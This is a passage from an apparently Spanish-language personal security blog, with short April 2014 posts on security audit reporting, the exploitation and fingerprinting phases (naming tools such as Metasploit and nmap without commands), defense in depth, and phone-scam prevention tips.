En este caso se habla de un particular y un video, pero en otras situaciones se trata de información confidencial de organizaciones, como estados de cuentas, bases de datos de clientes, información de las transacciones del negocio, y es una lista muy larga, por ello debe existir una adecuada gestión de la información, ya sea que seas un particular o administres la seguridad de una organización.
 
Saludos.
Lexer Pars. 

miércoles, 9 de abril de 2014

Etapa de generación de informe (auditoria de seguridad)(III de III)

Después de estos post sobre el informe, seguros que algunos aun tendrá muchas interrogantes sobre diversos aspectos y no es para menos, pues, puede que hayas hecho un trabajo excelente al momento de auditar, pero si no puedes plasmar de la forma correcta todos los problemas que has encontrado en la organización y las soluciones son complicadas de comprender, ya que estos informes además de que lo reciben los administradores, los altos directivos también tienen parte en esto.

Para finalizar con este post, quiero dejarte un informe completo de una auditoria, para que los tengas como referencia, cuando tengas que elaborar tus informes propios y no tengas ni una sola idea de como hacerlo. Este informe se realizo a una municipalidad y esta muy completo, así que a tomarlo en cuenta cuando te llegue la oportunidad de elaborar un informe para una organización.

Informe de auditoria


Saludos.
Lexer Pars.
******************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************

martes, 8 de abril de 2014

Etapa de generación de informe (auditoria de seguridad)(II de III)

Durante la auditoria se realizan una serie de evaluaciones a los sistemas de la organización con el fin de encontrar fallas o vulnerabilidades, políticas de seguridad, recursos humanos, documentación de software de aplicación, bases de datos, etc. En el informe se describe:


  • Equipos instalados, servidores, programas, sistemas operativos.
  • Procedimientos instalados.
  • Análisis de Seguridad en los equipos y en la red
  • Análisis de la eficiencia de los Sistemas y Programas informáticos
  • Gestión de los sistemas instalados.
  • Verificación del cumplimiento de normas
  • Vulnerabilidades que pudieran presentarse en una revisión de las estaciones de trabajo.
  • Otras.

  • Una vez obtenidos los resultados y verificados, se emite otro informe, indicándole el establecimiento de las medidas preventivas de refuerzo y/o corrección siguiendo siempre un proceso secuencial que permita a los administradores mejorar la seguridad de sus sistemas aprendiendo de los errores cometidos con anterioridad.
    Las auditorías de seguridad permiten conocer en el momento de su realización cuál es la situación exacta de sus activos de información en cuanto a protección, control y medidas de seguridad.
    Una Auditoria de Seguridad conlleva:
    • Amenazas y elementos de Seguridad de entrada y salida de datos.
    • Aspectos Gerenciales
    • Análisis de Riesgos
    • Identificación de amenazas. 
    • Seguridad en Internet
    • Control de Sistemas y Programas instalados  
    • Protocolo de Riesgos, Seguridad, Seguros, Programas instalados…
    • Protocolo ante perdidas, fraude y ciberataques
    • Planes de Contingencia y Recuperación de Desastres
    • Seguridad Física
    • Seguridad de Datos y Programas
    • Plan de Seguridad
    • Políticas de Seguridad
    • Medidas de Seguridad (Directivas, Preventivas y Correctivas)
    • Cadena de Custodia
    • LOPD 
    Saludos.
    Lexer Pars.
    ******************************************************************************************************************************************************************************************************************************************************************************
    ******************************************************************************************************************************************************************************************************************************************************************************

    lunes, 7 de abril de 2014

    Etapa de generación de informe (auditoria de seguridad)(I de III)

    Después de realizar las 3 etapas de footprinting, fingerprinting y la explotación de las vulnerabilidades encontradas en los sistemas de una organización, prosigue la generación del informe que se presentara con los altos directivos a cargo de la organización.

    El informe debe presentar un conjunto de características esenciales tales como:
    • Claridad.
    • Sencillez.
    • Concisión.
    • Propiedad.
    • Confiabilidad.
    • Exactitud.
    • Asertividad.
    • Imparcialidad.
    • Objetividad.
    • Congruencia.
    • Veracidad.
    • Efectividad.
    • Positividad.
    En el informe se deben señalar los resultados de las investigaciones, evaluaciones, hallazgos, aportaciones y conclusiones obtenidas durante todo el proceso de la auditoria, incluyendo todas las técnicas, herramientas, métodos y procedimientos utilizados para la obtención de datos y explotación de los sistemas.
    Los informes varían de un auditor a otro o de una empresa de consultoría a otra, pues se suelen llevar distintos formatos y métodos de trabajado en cada una, aunque suelen ser distintos cada uno, todos deben apegarse a un conjunto de principios básicos que veremos mas adelante.
    Saludos.
    Lexer Pars.
    ******************************************************************************************************************************************************************************************************************************************************************************
    ******************************************************************************************************************************************************************************************************************************************************************************

    domingo, 6 de abril de 2014

    Explotación (auditoria de seguridad)

    La tercera fase en una auditoria de seguridad es la explotación, después de que se ha realizado la fase de footprinting y fingerprinting, se procede a elaborar los vectores de ataque que se emplearan para tratar de vulnerar los sistemas y servicios que una determinada organización ofrece.

    Algunas técnicas y herramientas utilizadas en esta fase suelen ser:

    Técnicas
    1. Ataques de ingeniería social.
    2. Ataques de fuerza bruta.
    3. Ataques de ingeniería inversa.
    4. Ataques de spoofing.
    5. Utilización de APT.
    6. Ataques de red.
    7. Cracking.
    8. Etc.

    Herramientas:
    1. Metasploit.
    2. Medusa.
    3. Suite AirCrack.
    4. SE Toolkit.
    5. Malware.
    6. Ettercap.
    7. Etc.
    Las técnicas y herramientas son muy extensas e incluso hay distribuciones en GNU/Linux, que están elaboradas con un conjunto de herramientas útiles al momento de realizar una auditoria de seguridad en todas sus fases: footprinting, fingerprinting, explotación, generación del informe y el algunos casos solucionar los problemas como lo es el mas conocido Backtrack, que recientemente cambio de nombre a Kali Linux.

    Este tipo de sistemas es muy útil por su fina atención a las auditorias de seguridad, que no cabe duda es de tener siempre en mano al momento de realizar una auditoria y claro, aprender el funcionamiento de las herramientas, que son muchas y todas muy esenciales e importantes.

    Saludos.
    Lexer Pars.


    sábado, 5 de abril de 2014

    Modelo de seguridad en profundidad

    El modelo de seguridad en profundidad o defensa en profundidad es modelo de seguridad que es promovido por Microsoft el cual consiste en la implementación de una serie de practicas que permiten asegurar los sistemas y redes de una organización en diversas capas y su principio se basa en que cada capa al estar asegurada utilizando buenas practicas, ayudara a mitigar los ataques y reducir el impulso del ataque conforme este avance en cada una de las capas.
     
    Figura 1: Capas del modelo de seguridad en profundidad.
     
     
    Las capas de dicho modelo consisten en:
     
    1. Políticas, procedimientos y concienciación: Consiste en todas las normas o políticas de seguridad, procedimientos establecidos en caso de desastres o la materialización de alguna amenaza y la concienciación hacia los usuarios en materia de seguridad, que permitan entablar la base para las siguientes capas.
    2. Seguridad Física: En esta capa se busca implementar todas aquellas medidas de seguridad que permitan resguardar los activos físicos de la organización, utilizando técnicas y herramientas como sistemas biométricos para acceder a las instalaciones, sistemas de reguladores de temperatura para mantener los servidores en un ambiente adecuado, etc.
    3. Seguridad Perimetral: Consiste en la implementación de todas aquellas medidas que permitan asegurar la red de la organización, utilizando una zona desmilitarizada, VPN, servidores de seguridad, WAF, entre otros.
    4. Seguridad en Internet: En esta capa se pueden implementar sistemas de detección de intrusiones, sistemas de prevención de intrusiones, IPSec, segmentación de la red entre otras medidas que permitan mitigar los ataques provenientes desde internet.
    5. Seguridad en el Host: Esta capa busca securizar los servidores y estaciones de trabajo de la organización, realizado todo el proceso de hardening.
    6. Seguridad en las aplicaciones: En este nivel del modelo, se realizan practicas para garantizar que las aplicaciones sean seguras, como realización de auditorias a las aplicaciones constantemente.
    7. Seguridad en los datos: Este que es el ultimo nivel, consiste en las medidas que permitan manejar los datos de manera segura, por ejemplo la utilización de backups, utilización de ACL, implementación de DLP, un sistema de cifrado con un algoritmo fuerte que no sea vulnerable a colisiones, etc.
    Saludos.
    Lexer Pars.

    viernes, 4 de abril de 2014

    Estafas por telefono

    Las estafas por teléfono son un método fácil que utilizan algunos delincuentes para hacer dinero y es que a pesar de que ya tienen varios años que se conoce, aun mucha gente sigue cayendo ante este tipo de fraude.

     
    El hecho es que la mayoría de estafas telefónicas pueden ser detectadas y en todo caso evitar caer bajo este tipo de fraudes, pero hay que seguir una serie de consejos que en definitiva te ayudaran a mitigar el problema:
     
    1. No brindes información: Cuando alguien te llame, ya sea de tu empresa telefónica, de tu banco  de una chica o chico que no conoces pero que es tu admirador o admiradora y en general cualquier persona que desconozcas no brindes ningún tipo de información, pues la información que brindes puede ser utilizada en tu contrata para estafarte.
    2. Desconfía de mensajes o llamadas sospechosas: Cuando recibas llamadas o mensajes sospechosas pidiéndote datos sensibles, mas te vale que pierdas algo de tiempo verificando que es la persona o entidad quien dice ser, a que sufras un ataque de phone spoofing y te estafen.
    3. Si recibes alguna llamada tratando de extorsionarte pidiendo dinero porque tienen secuestrado ha algún familiar, amigo o conocido, asegúrate de que este bien, ya que en muchos casos las extorciones son una farsa y en realidad la persona no esta secuestrada y al final se termina pagando un rescate, cayendo nuevamente ante una estafa.
    4. Cuídate mucho de la información que dejas en internet, pues esa información puede ser de mucha utilidad para un delincuente, al momento de estafarte.
    5. Si detectas un caso de estafa, denúncialo con tus autoridades, para que empiece a disminuir la taza de este tipo de estafas y las personas resulten menos afectadas.
     
    Acá te dejo dos videos sobre algunas estafas que se realizan de forma telefónica y por supuesto, el consejo de denunciar y ser precavido.
     

    Estafa telefónica burlada


    Estafador Estafado!

    Saludos.
    Lexer Pars.

    

    jueves, 3 de abril de 2014

    Lexer y tus metas?

    Hoy tras llevar ya el cuarto mes del año que se esta esfumando de una forma muy rápida, llevo en proceso las metas que me he fijado a inicios de este 2014, que en verdad algunas metas han resultado un verdadero reto, como el escribir diariamente en el blog o haberme inscrito en el gimnasio y otras metas que llevo de forma paralela. 
     
    Aunque en muchas ocasiones suele ser complicado mantenerse fijo ante los retos, es satisfactorio ver como se avanza y se obtienen buenos resultados de ello. Otra meta que me he fijado recientemente es especializarme mas base de datos, llevarlo de la mano con la seguridad informática, que si bien es cierto ya he cursado algunos cursos en la Universidad sobre base de datos, aun hay mucho por explorar en ese mundo.
     
    En cuanto a las metas académicas no puedo quejarme en absoluto pues los resultados que he conseguido hasta el día de hoy han superado mis expectativas y todo marcha mejor de lo que es había planificado, así mismo los retos materiales que me fijado se están cumpliendo lentamente, pero a cabalidad que me mantienen motivados a continuar.
     
    Por lo pronto empezare a incluir mas contenido de base de datos en el blog, aunque ello no significa que dejare la seguridad, pero tratare de incluir un paso a paso de como iniciarse en el mundo tan especial y movido en las organizaciones como lo son las bases de datos acompañando con la seguridad. Espero que tu también estés realizando un seguimiento del progreso en tus metas, pues eso te marcara la pauta sobre si estas haciendo las cosas bien o mal y también te indicara cuan cerca o lejos estas de cumplir las metas que te has fijado.
     
    Saludos.
    Lexer Pars. 
     
     

    miércoles, 2 de abril de 2014

    Fingerprinting

    Esta es la siguiente etapa que se realiza en una auditoria de seguridad, después del footprinting, y consiste en identificar las huellas que dejan los sistemas en las conexiones que tienen en la red, basándose en el análisis de los paquetes y tipos de respuestas obtenidos en segmentos de tiempo.
     
    Es importante realizar este proceso, pues permite identificar los sistemas y plataformas que tiene una organización y que permiten elaborar vectores de ataque mas precisos. Por ejemplo la utilización de un exploit, puede que el sistema este corriendo con una plataforma GNU/Linux, Windows, Unix, etc, aunque hay exploit multiplataforma, es muy importante detectar que sistemas y versiones están disponibles, para utilizar un ataque mas preciso aprovechando alguna vulnerabilidad que pueda encontrarse presente.
     
    Para realizar esta tarea hay diversas herramientas muy útiles, para mi gusto, la que me es mas cómoda y familiar es nmap, que permite detectar los sistemas, versiones, los saltos en la red hasta llegar al objetivo, los puertos(abiertos, cerrados o filtrados) y un abanico de opciones al momento de realizar este proceso, previo a la explotación.
     
     

    Fingerprinting utilizando nmap

    Saludos.
    Lexer Pars.

    

    martes, 1 de abril de 2014

    (IN)Seguridad Informática y Hacking Corporativo

    Hoy después de un día agotador, aunque debo de agregar que muy satisfactorio, quiero compartirles una conferencia sobre Hacking corporativo. Esto sera todo por el día de hoy ya que necesito recuperar energías, que lo disfrutes y que aproveches el conocimiento. 


    Hacking Corporativo.
    Saludos.
    Lexer Pars.